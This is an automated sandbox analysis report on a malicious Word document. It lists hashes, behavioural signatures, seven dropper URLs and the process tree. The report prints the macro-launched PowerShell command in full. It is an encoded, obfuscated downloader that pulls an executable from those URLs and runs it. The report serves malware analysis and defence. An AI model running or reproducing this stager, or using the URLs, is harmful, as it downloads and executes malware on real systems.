Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
  • submitted
    02/06/2024, 09:46

General

  • Target

    8da7c83a361c64cfa79e3d6614bae6f6_JaffaCakes118.doc

  • Size

    199KB

  • MD5

    8da7c83a361c64cfa79e3d6614bae6f6

  • SHA1

    71ee435debea08d26e28406593e3622698361962

  • SHA256

    895d3180e6cd0f21d0b56b5061eb6a16f029d010fc833dd6fc2b85ebbbd6b76b

  • SHA512

    3558145f7e539d1293d2d3a9eae0d9a9d468488ad59986afe04c9849ad579fd88473b16a051e8c9c2a568c540e0b7c299b204b9423eea44e1b4a9cb3a1d89d75

  • SSDEEP

    1536:PGGGGGGGGGG2xJLEt+LaaGGGGGGGGGGjLo9xilpfsdKY7xST/Ephkop8cEpTWj14:xrfrzOH98ipgvEDvxBY5a

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

https://houtai.xiaopbk.com/install/t0H/

exe.dropper

https://gudangalami.com/ivo6rp/UaBj2/

exe.dropper

https://webhostingsrilanka.info/pkrgs/ODn/

exe.dropper

http://luzzeri.com/wp-includes/T1mrkC/

exe.dropper

http://mobithem.com/blogs/Z3/

exe.dropper

http://planosdesaudesemcarencia.com/erros/E8iv/

exe.dropper

http://lookuppopup.co.uk/content/uploads/XNEm9/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 9 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\8da7c83a361c64cfa79e3d6614bae6f6_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2132
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2164
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -encod JABEAHcAdgBnAG4ANQBfAD0AKAAnAFkAawAnACsAKAAnADYAJwArACcAbQBrADgAaAAnACkAKQA7ACYAKAAnAG4AZQAnACsAJwB3ACcAKwAnAC0AaQB0AGUAbQAnACkAIAAkAEUATgB2ADoAdQBTAGUAcgBQAHIATwBmAGkATABFAFwARQBNAGsAcgBFAEwASwBcAHQAZwA4ADAAdQBSADEAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAAZABJAFIAZQBDAHQATwBSAFkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMAYABFAEMAVQBSAGAAaQBUAHkAUABSAGAAbwB0AE8AYwBgAE8ATAAiACAAPQAgACgAJwB0ACcAKwAnAGwAcwAnACsAKAAnADEAJwArACcAMgAsACcAKQArACgAJwAgAHQAbABzACcAKwAnADEAMQAnACsAJwAsACAAdABsAHMAJwApACkAOwAkAFYAbQBmAHoAdAA1ADMAIAA9ACAAKAAnAFYAdgAnACsAJwB2ACcAKwAoACcAcQBkAG0AJwArACcAMgAnACkAKQA7ACQASABuAHcAZQB1AHYANAA9ACgAJwBRACcAKwAoACcAeQB1ADkAJwArACcAagAnACsAJwB3AHMAJwApACkAOwAkAEEAdQAwAG4AbABxAHUAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAKAAoACgAJwBmACcAKwAnAGcASwAnACkAKwAoACcARQBtACcAKwAnAGsAcgBlACcAKQArACgAJwBsAGsAJwArACcAZgAnACsAJwBnAEsAVABnACcAKwAnADgAMAB1ACcAKQArACgAJwByACcAKwAnADEAZgBnAEsAJwApACkALgAiAFIARQBgAHAAYABMAGEAQwBFACIAKAAoAFsAQwBIAGEAUgBdADEAMAAyACsAWwBDAEgAYQBSAF0AMQAwADMAKwBbAEMASABhAFIAXQA3ADUAKQAsACcAXAAnACkAKQArACQAVgBtAGYAegB0ADUAMwArACgAKAAnAC4AZQAnACsAJwB4ACcAKQArACcAZQAnACkAOwAkAEoAdAB1ADUAcQA5AG0APQAoACgAJwBaACcAKwAnAHYAZQAnACkAKwAoACcAMAA4ACcAKwAnAGoAbwAnACkAKQA7ACQAVwBfAHEAdwAyAGwAaAA9AC4AKAAnAG4AZQB3AC0AJwArACcAbwBiAGoAJwArACcAZQAnACsAJwBjAHQAJwApACAATgBFAHQALgBXAEUAQgBDAEwAaQBlAE4AdAA7ACQARgByAHcAeQB6AHEAdgA9ACgAJwBoACcAKwAnAHQAdAAnACsAKAAnAHAAcwA6ACcAKwAnAC8ALwBoAG8AJwArACcAdQB0AGEAJwApACsAKAAnAGkALgAnACsAJwB4AGkAJwApACsAJwBhACcAKwAoACcAbwBwAGIAawAuAGMAbwAnACsAJwBtACcAKwAnAC8AJwArACcAaQBuACcAKQArACgAJwBzAHQAYQBsACcAKwAnAGwAJwApACsAKAAnAC8AdAAwACcAKwAnAEgALwAqACcAKQArACgAJwBoAHQAdAAnACsAJwBwAHMAJwApACsAJwA6AC8AJwArACcALwAnACsAKAAnAGcAJwArACcAdQBkAGEAbgAnACkAKwAoACcAZwBhAGwAJwArACcAYQAnACkAKwAoACcAbQAnACsAJwBpAC4AJwArACcAYwBvAG0ALwAnACkAKwAoACcAaQAnACsAJwB2ACcAKwAnAG8ANgByACcAKwAnAHAALwBVAGEAQgBqACcAKQArACgAJwAyACcAKwAnAC8AKgBoACcAKwAnAHQAdABwACcAKQArACcAcwA6ACcAKwAoACcALwAvAHcAZQAnACsAJwBiACcAKwAnAGgAbwBzAHQAaQAnACkAKwAnAG4AJwArACcAZwAnACsAJwBzACcAKwAnAHIAaQAnACsAJwBsACcAKwAoACcAYQBuACcAKwAnAGsAYQAnACkAKwAoACcALgBpAG4AJwArACcAZgBvAC8AJwArACcAcAAnACsAJwBrAHIAZwBzAC8ATwBEAG4ALwAnACkAKwAnACoAaAAnACsAKAAnAHQAJwArACcAdABwACcAKQArACcAOgAnACsAKAAnAC8AJwArACcALwBsAHUAJwApACsAKAAnAHoAegBlACcAKwAnAHIAJwArACcAaQAuAGMAJwApACsAJwBvAG0AJwArACcALwAnACsAKAAnAHcAJwArACcAcAAtACcAKQArACcAaQBuACcAKwAoACcAYwAnACsAJwBsAHUAZAAnACkAKwAnAGUAJwArACgAJwBzAC8AVAAxACcAKwAnAG0AcgAnACsAJwBrAEMALwAqACcAKwAnAGgAdAB0AHAAOgAvACcAKQArACgAJwAvAG0AJwArACcAbwAnACkAKwAoACcAYgBpAHQAJwArACcAaAAnACkAKwAnAGUAbQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAoACcAYgBsACcAKwAnAG8AZwBzAC8AJwApACsAJwBaADMAJwArACgAJwAvACcAKwAnACoAaAAnACkAKwAnAHQAJwArACcAdABwACcAKwAoACcAOgAvAC8AcAAnACsAJwBsACcAKQArACgAJwBhAG4AJwArACcAbwAnACkAKwAnAHMAJwArACcAZABlACcAKwAoACcAcwAnACsAJwBhAHUAJwApACsAJwBkAGUAJwArACgAJwBzACcAKwAnAGUAbQBjACcAKwAnAGEAcgBlAG4AJwApACsAJwBjAGkAJwArACgAJwBhAC4AJwArACcAYwBvACcAKwAnAG0ALwBlACcAKQArACgAJwByAHIAJwArACcAbwAnACkAKwAoACcAcwAvAEUAOAAnACsAJwBpACcAKQArACgAJwB2ACcAKwAnAC8AKgAnACkAKwAnAGgAdAAnACsAKAAnAHQAcAA6ACcAKwAnAC8ALwBsAG8AbwAnACkAKwAnAGsAdQAnACsAJwBwACcAKwAoACcAcAAnACsAJwBvAHAAJwApACsAJwB1ACcAKwAoACcAcAAuAGMAJwArACcAbwAuAHUAJwArACcAawAvAGMAJwArACcAbwAnACkAKwAoACcAbgB0ACcAKwAnAGUAbgB0AC8AJwArACcAdQBwAGwAbwBhAGQAJwArACcAcwAvAFgAJwApACsAKAAnAE4ARQAnACsAJwBtACcAKQArACcAOQAvACcAKQAuACIAUwBwAGAAbABJAFQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABXADYANwBfAGkANgBoAD0AKAAnAE0AdAAnACsAJwB6ACcAKwAoACcAeAAnACsAJwBuAGoAYwAnACkAKQA7AGYAbwByAGUAYQBjAGgAKAAkAEQAdwBxADMANABvADUAIABpAG4AIAAkAEYAcgB3AHkAegBxAHYAKQB7AHQAcgB5AHsAJABXAF8AcQB3ADIAbABoAC4AIgBEAGAAbwB3AE4AbABPAGAAQQBkAEYAYABJAGwARQAiACgAJABEAHcAcQAzADQAbwA1ACwAIAAkAEEAdQAwAG4AbABxAHUAKQA7ACQAQwBpAGQAdgA0ADgAawA9ACgAKAAnAEEAMgAnACsAJwBmADAAcQAnACkAKwAnADUAcQAnACkAOwBJAGYAIAAoACgAJgAoACcARwBlAHQAJwArACcALQAnACsAJwBJAHQAZQBtACcAKQAgACQAQQB1ADAAbgBsAHEAdQApAC4AIgBMAGUAYABOAGcAVABoACIAIAAtAGcAZQAgADIANwA2ADkANQApACAAewAuACgAJwBJAG4AdgBvAGsAZQAtACcAKwAnAEkAJwArACcAdABlAG0AJwApACgAJABBAHUAMABuAGwAcQB1ACkAOwAkAFQAYgBvADEAcwBkAHQAPQAoACgAJwBGACcAKwAnAG0AOAAnACkAKwAnAGkAJwArACgAJwB6ACcAKwAnAHMAMQAnACkAKQA7AGIAcgBlAGEAawA7ACQAWAA2AHkAZwA0AGEAXwA9ACgAJwBOADAAJwArACgAJwBzAHoAJwArACcAagAnACkAKwAnADgAeQAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEkAbQB3AGgAeQB0AHYAPQAoACcATwAnACsAKAAnAGoAJwArACcAdgB1AG8AZQBtACcAKQApAA==
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2708

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      20KB

      MD5

      c84a2cf94983dc1c387d29edb3f5284b

      SHA1

      8444855f61db25c6e4a2e079f2feaa9203184253

      SHA256

      e295df0ecd8f12475d570a4b24778b974eb29b0e1a523983e964eb269a758af8

      SHA512

      2c7f6d71795c873a1b6b621075705dee00abc9dd57382fff8ff2552363e166ccf0cd069dfbf1bb80467381e04cafcc6711396f8a765236c1d2e617f7476d126e

    • memory/2132-30-0x0000000000350000-0x0000000000450000-memory.dmp

      Filesize

      1024KB

    • memory/2132-28-0x0000000000350000-0x0000000000450000-memory.dmp

      Filesize

      1024KB

    • memory/2132-6-0x0000000000350000-0x0000000000450000-memory.dmp

      Filesize

      1024KB

    • memory/2132-7-0x0000000000350000-0x0000000000450000-memory.dmp

      Filesize

      1024KB

    • memory/2132-22-0x0000000000350000-0x0000000000450000-memory.dmp

      Filesize

      1024KB

    • memory/2132-26-0x0000000000350000-0x0000000000450000-memory.dmp

      Filesize

      1024KB

    • memory/2132-20-0x0000000000350000-0x0000000000450000-memory.dmp

      Filesize

      1024KB

    • memory/2132-18-0x0000000000350000-0x0000000000450000-memory.dmp

      Filesize

      1024KB

    • memory/2132-17-0x0000000000350000-0x0000000000450000-memory.dmp

      Filesize

      1024KB

    • memory/2132-16-0x0000000000350000-0x0000000000450000-memory.dmp

      Filesize

      1024KB

    • memory/2132-14-0x0000000000350000-0x0000000000450000-memory.dmp

      Filesize

      1024KB

    • memory/2132-13-0x0000000000350000-0x0000000000450000-memory.dmp

      Filesize

      1024KB

    • memory/2132-12-0x0000000000350000-0x0000000000450000-memory.dmp

      Filesize

      1024KB

    • memory/2132-10-0x0000000000350000-0x0000000000450000-memory.dmp

      Filesize

      1024KB

    • memory/2132-27-0x0000000000350000-0x0000000000450000-memory.dmp

      Filesize

      1024KB

    • memory/2132-32-0x0000000000350000-0x0000000000450000-memory.dmp

      Filesize

      1024KB

    • memory/2132-31-0x0000000000350000-0x0000000000450000-memory.dmp

      Filesize

      1024KB

    • memory/2132-0-0x000000002F661000-0x000000002F662000-memory.dmp

      Filesize

      4KB

    • memory/2132-2-0x00000000710ED000-0x00000000710F8000-memory.dmp

      Filesize

      44KB

    • memory/2132-29-0x0000000000350000-0x0000000000450000-memory.dmp

      Filesize

      1024KB

    • memory/2132-21-0x0000000000350000-0x0000000000450000-memory.dmp

      Filesize

      1024KB

    • memory/2132-25-0x0000000000350000-0x0000000000450000-memory.dmp

      Filesize

      1024KB

    • memory/2132-24-0x0000000000350000-0x0000000000450000-memory.dmp

      Filesize

      1024KB

    • memory/2132-33-0x0000000000350000-0x0000000000450000-memory.dmp

      Filesize

      1024KB

    • memory/2132-23-0x0000000000350000-0x0000000000450000-memory.dmp

      Filesize

      1024KB

    • memory/2132-9-0x0000000000350000-0x0000000000450000-memory.dmp

      Filesize

      1024KB

    • memory/2132-8-0x0000000000350000-0x0000000000450000-memory.dmp

      Filesize

      1024KB

    • memory/2132-11-0x0000000000350000-0x0000000000450000-memory.dmp

      Filesize

      1024KB

    • memory/2132-67-0x00000000710ED000-0x00000000710F8000-memory.dmp

      Filesize

      44KB

    • memory/2132-66-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2132-46-0x00000000710ED000-0x00000000710F8000-memory.dmp

      Filesize

      44KB

    • memory/2132-47-0x0000000000350000-0x0000000000450000-memory.dmp

      Filesize

      1024KB

    • memory/2132-48-0x0000000005BB0000-0x0000000005CB0000-memory.dmp

      Filesize

      1024KB

    • memory/2132-49-0x0000000000350000-0x0000000000450000-memory.dmp

      Filesize

      1024KB

    • memory/2132-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2708-40-0x0000000001D20000-0x0000000001D28000-memory.dmp

      Filesize

      32KB

    • memory/2708-39-0x000000001B790000-0x000000001BA72000-memory.dmp

      Filesize

      2.9MB